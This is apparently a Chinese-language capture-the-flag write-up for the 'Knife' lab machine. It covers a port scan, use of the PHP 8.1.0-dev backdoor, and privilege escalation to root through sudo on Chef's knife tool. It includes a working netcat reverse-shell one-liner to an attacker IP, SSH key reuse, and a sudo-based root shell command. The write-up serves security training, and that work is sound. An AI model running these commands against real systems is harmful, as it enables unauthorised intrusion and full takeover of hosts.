基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ nmap -sC -sV 10.10.10.242

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 13:08 CST
Nmap scan report for 10.10.10.242
Host is up (0.064s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.26 seconds

80

PHP backdoor

PHP/8.1.0-dev,这个之前被供应链加过后门:

可以直接执行命令:

reverse shell & user flag

直接打到james用户shell,用户目录user.txt:

1
2
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 4444 >/tmp/f
python3 -c 'import pty;pty.spawn("/bin/bash")'

另外james用户.ssh目录直接有一对公私钥,可以用这个后面直接ssh方便操作:

1
2
3
james@knife:~/.ssh$ cat id_rsa.pub > authorized_keys

ssh -i james_id_rsa james@10.10.10.242

提权信息

sudo 发现knife,这是chef workstation里的:

根据文档,exec可以执行ruby代码,所以就可以直接用sudo执行ruby的提权方式:

提权 & root flag

1
sudo /usr/bin/knife exec -E 'exec "/bin/bash"'

参考资料